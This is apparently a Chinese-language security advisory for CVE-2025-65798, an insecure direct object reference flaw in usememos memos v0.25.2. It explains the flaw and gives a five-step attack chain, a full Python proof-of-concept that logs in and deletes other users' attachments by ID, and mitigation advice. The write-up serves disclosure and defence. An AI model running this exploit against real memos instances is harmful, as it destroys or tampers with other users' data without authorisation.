CVE-2025-65798: usememos memos v0.25.2 访问控制错误漏洞

漏洞信息

漏洞编号

CVE-2025-65798

漏洞类型

访问控制错误

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

usememos memos v0.25.2

漏洞概述

CVE-2025-65798是usememos memos系统中发现的一个中等严重性访问控制错误漏洞。usememos是一款开源的自托管备忘录应用，被广泛应用于个人和团队的知识管理。该漏洞存在于v0.25.2版本中，攻击者通过利用系统中的访问控制缺陷，可以突破权限限制对其他用户上传的附件进行任意修改或删除操作。

该漏洞的核心问题在于系统未能正确验证用户对附件资源的操作权限。在正常的访问控制模型中，用户应该只能管理自己创建的附件资源，而无法访问或操作其他用户的附件。然而，由于usememos memos v0.25.2版本在附件管理功能中缺少充分的权限校验逻辑，低权限用户可以利用API接口或相关功能模块，绕过授权机制对其他用户上传的附件执行修改和删除操作。

此漏洞的成功利用可能导致以下后果：首先，攻击者可以非法删除其他用户的附件文件，造成数据丢失；其次，攻击者可以篡改附件内容，可能用于传播恶意信息或进行钓鱼攻击；此外，该漏洞还可能与其他安全缺陷结合，形成更严重的安全威胁。由于该漏洞无需特殊的攻击条件，普通注册用户即可发起攻击，因此实际威胁程度较高。建议使用该版本的用户尽快升级到最新补丁版本或采取临时缓解措施。

技术细节

该漏洞属于IDOR（Insecure Direct Object Reference，不安全的直接对象引用）类型的访问控制错误。在usememos memos v0.25.2的附件管理模块中，系统通过附件ID直接访问资源对象，而未充分验证当前登录用户是否有权对该附件进行操作。

技术层面分析，攻击者首先需要拥有一个低权限账户（如普通用户账号），然后通过系统功能获取目标附件的ID。常见的附件ID获取方式包括：1）通过API接口枚举附件列表；2）通过公开的附件链接分析ID规律；3）通过社会工程学手段获取附件ID信息。获取到目标附件ID后，攻击者构造恶意的API请求（如DELETE或PUT请求），指定目标附件ID作为操作参数。

由于服务端在处理请求时仅验证用户是否已登录（低权限认证），而未验证用户与附件的归属关系，导致请求被成功执行。攻击者可以通过修改请求中的附件ID参数，遍历访问系统中任意附件，并执行修改或删除操作。

漏洞利用的关键API端点可能包括：/api/v1/memo/:memoId/attachment、/api/v1/resource/:resourceId等。攻击者通过Burp Suite等工具拦截正常请求，修改附件ID参数即可实现越权操作。建议开发者采用基于用户会话的访问控制检查，确保每次资源操作都验证当前用户是否有权访问目标资源。

攻击链分析

STEP 1

步骤1

攻击者注册并登录usememos memos系统，获得低权限用户账户

STEP 2

步骤2

攻击者通过API接口（如/api/v1/resource）枚举系统中可访问的附件资源，获取目标附件的ID

STEP 3

步骤3

攻击者构造恶意HTTP请求（DELETE或PUT），在请求参数中指定目标附件ID

STEP 4

步骤4

服务端接收请求，由于未正确验证用户与附件的归属关系，请求被成功执行

STEP 5

步骤5

攻击者成功删除或修改其他用户上传的附件，造成数据泄露或数据损坏

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-65798 PoC - usememos memos v0.25.2 IDOR Vulnerability
This PoC demonstrates the Insecure Direct Object Reference vulnerability
in usememos memos that allows low-privilege users to delete/modify
attachments belonging to other users.
"""

import requests
import json
import sys

class MemosIDORExploit:
    def __init__(self, target_url, username, password):
        self.target_url = target_url.rstrip('/')
        self.username = username
        self.password = password
        self.session = requests.Session()
        self.token = None
        self.user_id = None
    
    def login(self):
        """Authenticate and obtain access token"""
        login_url = f"{self.target_url}/api/v1/auth/login"
        data = {
            "username": self.username,
            "password": self.password
        }
        try:
            response = self.session.post(login_url, json=data, timeout=10)
            if response.status_code == 200:
                result = response.json()
                self.token = result.get('accessToken')
                self.user_id = result.get('user', {}).get('id')
                print(f"[+] Login successful! User ID: {self.user_id}")
                return True
            else:
                print(f"[-] Login failed: {response.status_code}")
                return False
        except Exception as e:
            print(f"[-] Login error: {e}")
            return False
    
    def get_attachments(self):
        """Enumerate attachments (may include other users' attachments)"""
        headers = {"Authorization": f"Bearer {self.token}"}
        try:
            response = self.session.get(
                f"{self.target_url}/api/v1/resource",
                headers=headers,
                timeout=10
            )
            if response.status_code == 200:
                return response.json().get('data', [])
        except Exception as e:
            print(f"[-] Error fetching attachments: {e}")
        return []
    
    def delete_attachment(self, resource_id):
        """Delete target attachment (IDOR vulnerability)"""
        headers = {"Authorization": f"Bearer {self.token}"}
        try:
            response = self.session.delete(
                f"{self.target_url}/api/v1/resource/{resource_id}",
                headers=headers,
                timeout=10
            )
            if response.status_code == 200:
                print(f"[+] Successfully deleted attachment: {resource_id}")
                return True
            else:
                print(f"[-] Delete failed: {response.status_code}")
                return False
        except Exception as e:
            print(f"[-] Delete error: {e}")
            return False
    
    def exploit(self, target_resource_id):
        """Execute the IDOR exploit"""
        print(f"[*] Target resource ID: {target_resource_id}")
        print("[*] Attempting IDOR attack to delete arbitrary attachment...")
        return self.delete_attachment(target_resource_id)


def main():
    if len(sys.argv) < 5:
        print("Usage: python3 cve-2025-65798_poc.py <target_url> <username> <password> <target_resource_id>")
        print("Example: python3 cve-2025-65798_poc.py http://localhost:5230 attacker password 123456")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    resource_id = sys.argv[4]
    
    exploit = MemosIDORExploit(target, user, pwd)
    
    if exploit.login():
        print("[*] Enumerating attachments...")
        attachments = exploit.get_attachments()
        print(f"[*] Found {len(attachments)} attachment(s)")
        
        print("[*] Executing IDOR exploit...")
        exploit.exploit(resource_id)


if __name__ == "__main__":
    main()

影响范围

usememos memos v0.25.2

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1）限制usememos memos的API访问，仅允许受信任的IP访问管理接口；2）启用Web应用防火墙（WAF）规则，对异常的附件操作请求进行监控和阻断；3）定期备份附件数据，以便在遭受攻击后进行恢复；4）监控系统日志，关注异常的附件删除或修改行为；5）考虑暂时禁用附件上传功能，直到漏洞被修复。建议管理员密切关注官方GitHub仓库（https://github.com/usememos/memos/pull/5217）获取最新的安全更新。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-65798
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-65798
3 Details https://www.cvedetails.com/cve/CVE-2025-65798/
4 VulDB https://vuldb.com/cve/CVE-2025-65798
5 Link http://memos.com
6 Link http://usememos.com
7 Link https://github.com/usememos/memos/pull/5217
8 Link https://herolab.usd.de/security-advisories/usd-2025-0059/